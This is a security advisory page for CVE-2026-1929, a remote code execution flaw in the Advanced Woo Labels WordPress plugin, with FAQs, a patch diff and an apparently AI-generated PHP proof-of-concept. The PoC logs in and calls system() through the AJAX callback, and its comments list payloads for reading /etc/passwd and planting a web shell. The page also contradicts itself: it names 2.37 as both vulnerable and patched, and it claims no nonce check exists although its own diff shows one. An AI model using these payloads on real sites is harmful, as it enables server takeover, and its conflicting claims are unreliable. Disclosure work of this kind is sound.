What is CVE-2026-1929?

CVE-2026-1929 is a high-severity vulnerability in the Advanced Woo Labels plugin for WordPress, allowing authenticated users with Contributor-level access and above to execute arbitrary PHP functions on the server. This is due to improper handling of user-controlled input in the AJAX handler.

How does the vulnerability work?

The vulnerability occurs in the `get_select_option_values()` function, which uses `call_user_func_array()` with user-supplied input without proper validation. Attackers can manipulate the ‘callback’ parameter to execute any PHP function, potentially leading to remote code execution.

Who is affected by this vulnerability?

All users of the Advanced Woo Labels plugin on WordPress versions up to and including 2.36 are affected. Specifically, authenticated users with Contributor privileges and above can exploit this vulnerability.

How can I check if my site is vulnerable?

Check the version of the Advanced Woo Labels plugin installed on your WordPress site. If it is version 2.36 or earlier, your site is vulnerable. Additionally, review user roles to determine if any Contributor-level users have access.

How can I fix this vulnerability?

Update the Advanced Woo Labels plugin to version 2.37 or later, where the vulnerability has been patched. Ensure that only trusted users have Contributor-level access or higher.

What does the CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity vulnerability, meaning it poses a significant risk to the security of the system. It suggests that successful exploitation could lead to severe consequences, including full server control.

What are the risks of exploitation?

Exploitation of this vulnerability can allow attackers to execute arbitrary commands, create backdoors, manipulate databases, and compromise the entire WordPress installation. This can lead to data loss, unauthorized access, and further system compromise.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the AJAX handler with a malicious ‘callback’ parameter. This demonstrates the ease with which an attacker can execute arbitrary commands on the server.

What security measures were introduced in the patch?

The patch in version 2.37 implements several security measures, including a capability check for ‘manage_options’, validation of the callback against an allowlist, and sanitization of callback parameters. These changes restrict access to authorized users and mitigate the risk of exploitation.

Can this vulnerability be exploited without authentication?

No, this vulnerability requires an attacker to be authenticated with at least Contributor-level access. This means that only users who have logged into the WordPress site can attempt to exploit this vulnerability.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider restricting access to the WordPress admin area, reviewing user roles, and monitoring for any suspicious activity. Additionally, you may want to temporarily disable the plugin until it can be updated.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1929: Advanced Woo Labels <= 2.37 – Authenticated (Contributor+) Remote Code Execution via 'callback' Parameter (advanced-woo-labels)

CVE ID CVE-2026-1929

Plugin advanced-woo-labels

Severity High (CVSS 8.8)

CWE 94

Vulnerable Version 2.36

Patched Version 2.37

Disclosed February 23, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1929:
This vulnerability is an authenticated remote code execution flaw in the Advanced Woo Labels WordPress plugin, affecting versions up to and including 2.36. The vulnerability resides in the plugin’s AJAX handler, allowing Contributor-level users and above to execute arbitrary PHP functions and operating system commands. The CVSS score of 8.8 reflects the high severity of this issue.

The root cause is the `get_select_option_values()` function in `/includes/admin/class-awl-admin-ajax.php`. The function directly passes user-controlled input from the `$_POST[‘callback’]` parameter to `call_user_func_array()` without proper validation or authorization. The vulnerable code lacks a capability check and does not restrict the callback function to an allowlist. This allows attackers to specify any PHP function as the callback, including dangerous functions like `system()`, `exec()`, or `shell_exec()`.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `get_select_option_values`. The critical payload is in the `callback` parameter, which can contain any PHP function name. The `param` parameter supplies arguments to the callback function. For example, setting `callback=system` and `param[]=id` would execute the `id` command on the server.

The patch in version 2.37 introduces three key security measures. First, it adds a capability check requiring `manage_options` permission, restricting access to administrators only. Second, it validates the callback against a predefined list of legitimate functions from the `AWL_Admin_Options::include_rules()` array. Third, it sanitizes callback parameters with `array_map(‘sanitize_text_field’, $callback_params)`. These changes ensure only authorized users can call approved functions with sanitized inputs.

Successful exploitation grants attackers arbitrary code execution on the underlying server. Attackers can execute operating system commands, read or write files, create backdoors, manipulate the database, and potentially compromise the entire WordPress installation and hosting environment. The vulnerability provides a direct path from Contributor-level access to full server control.

Differential between vulnerable and patched code

Code Diff

--- a/advanced-woo-labels/advanced-woo-labels.php
+++ b/advanced-woo-labels/advanced-woo-labels.php
@@ -3,7 +3,7 @@
 /*
 Plugin Name: Advanced Woo Labels
 Description: Advance WooCommerce product labels plugin
-Version: 2.36
+Version: 2.37
 Author: ILLID
 Plugin URI: https://advanced-woo-labels.com/
 Author URI: https://advanced-woo-labels.com/
@@ -91,7 +91,7 @@
      */
     private function define_constants() {

-        $this->define( 'AWL_VERSION', '2.36' );
+        $this->define( 'AWL_VERSION', '2.37' );

         $this->define( 'AWL_DIR', plugin_dir_path( AWL_FILE ) );
         $this->define( 'AWL_URL', plugin_dir_url( AWL_FILE ) );
--- a/advanced-woo-labels/includes/admin/class-awl-admin-ajax.php
+++ b/advanced-woo-labels/includes/admin/class-awl-admin-ajax.php
@@ -127,14 +127,38 @@
         }

         /*
-         * Ajax hook to search for products
+         * Ajax hook to get values by calling callback function
          */
         public function get_select_option_values() {

             check_ajax_referer( 'awl_admin_ajax_nonce' );

+            if ( ! current_user_can( 'manage_options' ) ) {
+                wp_send_json_error( 'Insufficient permissions.' );
+            }
+
             $callback = sanitize_text_field( $_POST['callback'] );
+
+            // make sure that the callback is legit
+            $legit = false;
+            $rules = AWL_Admin_Options::include_rules();
+            foreach ( $rules as $rule_section => $section_rules ) {
+                foreach ( $section_rules as $rule ) {
+                    if ( ( isset( $rule['choices'] ) && isset( $rule['choices']['callback'] ) && $rule['choices']['callback'] === $callback ) ||
+                        ( isset( $rule['suboption'] ) && isset( $rule['suboption']['callback'] ) && $rule['suboption']['callback'] === $callback )
+                    ) {
+                        $legit = true;
+                        break 2;
+                    }
+                }
+            }
+
+            if ( ! $legit ) {
+                wp_send_json_error( 'Invalid callback.' );
+            }
+
             $callback_params = isset( $_POST['param'] ) ? (array) $_POST['param'] : array();
+            $callback_params = array_map( 'sanitize_text_field', $callback_params );

             $term = isset( $_POST['search'] ) ? sanitize_text_field( $_POST['search'] ) : '';
             $term = (string) wc_clean( wp_unslash( $term ) );
--- a/advanced-woo-labels/includes/admin/class-awl-admin-notices.php
+++ b/advanced-woo-labels/includes/admin/class-awl-admin-notices.php
@@ -91,7 +91,7 @@

                 $html .= '<div class="awl-integration-notice notice notice-success" style="position:relative;display:flex;">';
                     $html .= '<div style="margin: 20px 20px 0 0;" class="awl-integration-notice--logo">';
-                        $html .= '<img style="max-width:70px;border-radius:3px;" src="' . AWL_URL . 'assets/img/logo.jpeg' . '">';
+                        $html .= '<img style="max-width:70px;border-radius:3px;" src="' . AWL_URL . 'assets/img/square-logo.png' . '">';
                     $html .= '</div>';
                     $html .= '<div class="awl-integration-notice--content">';
                         $html .= '<h2>Advanced Woo Labels: ' . __( 'Integrations for your plugins', 'advanced-woo-labels' ) . '</h2>';

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1929 - Advanced Woo Labels <= 2.37 - Authenticated (Contributor+) Remote Code Execution via 'callback' Parameter

<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'contributor_user';
$password = 'contributor_password';

// Step 1: Authenticate to WordPress and obtain session cookies
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
]);
$response = curl_exec($ch);

// Step 2: Exploit the vulnerable AJAX endpoint
// The action parameter must match the AJAX hook: 'get_select_option_values'
// The callback parameter can be any PHP function, including system commands
$exploit_payload = [
    'action' => 'get_select_option_values',
    'callback' => 'system',           // Arbitrary PHP function
    'param[]' => 'id',                // Command to execute
    'search' => '',                   // Optional search term
    '_ajax_nonce' => ''               // Nonce is not validated in vulnerable versions
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => $exploit_payload,
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);

$response = curl_exec($ch);
curl_close($ch);

// Step 3: Display the command output
echo "Command Output:n";
echo $response;

// Alternative payload examples:
// callback=shell_exec&param[]=ls -la
// callback=exec&param[]=cat /etc/passwd
// callback=passthru&param[]=whoami
// callback=file_put_contents&param[]=shell.php&param[]=<?php system($_GET['cmd']);?>

?>

Frequently Asked Questions

What is CVE-2026-1929?
Understanding the vulnerability
CVE-2026-1929 is a high-severity vulnerability in the Advanced Woo Labels plugin for WordPress, allowing authenticated users with Contributor-level access and above to execute arbitrary PHP functions on the server. This is due to improper handling of user-controlled input in the AJAX handler.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability occurs in the `get_select_option_values()` function, which uses `call_user_func_array()` with user-supplied input without proper validation. Attackers can manipulate the ‘callback’ parameter to execute any PHP function, potentially leading to remote code execution.
Who is affected by this vulnerability?
Identifying impacted users
All users of the Advanced Woo Labels plugin on WordPress versions up to and including 2.36 are affected. Specifically, authenticated users with Contributor privileges and above can exploit this vulnerability.
How can I check if my site is vulnerable?
Assessing your WordPress installation
Check the version of the Advanced Woo Labels plugin installed on your WordPress site. If it is version 2.36 or earlier, your site is vulnerable. Additionally, review user roles to determine if any Contributor-level users have access.
How can I fix this vulnerability?
Steps to secure your site
Update the Advanced Woo Labels plugin to version 2.37 or later, where the vulnerability has been patched. Ensure that only trusted users have Contributor-level access or higher.
What does the CVSS score of 8.8 indicate?
Understanding the severity rating
A CVSS score of 8.8 indicates a high severity vulnerability, meaning it poses a significant risk to the security of the system. It suggests that successful exploitation could lead to severe consequences, including full server control.
What are the risks of exploitation?
Potential impacts on your site
Exploitation of this vulnerability can allow attackers to execute arbitrary commands, create backdoors, manipulate databases, and compromise the entire WordPress installation. This can lead to data loss, unauthorized access, and further system compromise.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the AJAX handler with a malicious ‘callback’ parameter. This demonstrates the ease with which an attacker can execute arbitrary commands on the server.
What security measures were introduced in the patch?
Improvements in version 2.37
The patch in version 2.37 implements several security measures, including a capability check for ‘manage_options’, validation of the callback against an allowlist, and sanitization of callback parameters. These changes restrict access to authorized users and mitigate the risk of exploitation.
Can this vulnerability be exploited without authentication?
Access requirements for exploitation
No, this vulnerability requires an attacker to be authenticated with at least Contributor-level access. This means that only users who have logged into the WordPress site can attempt to exploit this vulnerability.
What should I do if I cannot update the plugin immediately?
Mitigation steps until patching
If you cannot update the plugin immediately, consider restricting access to the WordPress admin area, reviewing user roles, and monitoring for any suspicious activity. Additionally, you may want to temporarily disable the plugin until it can be updated.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations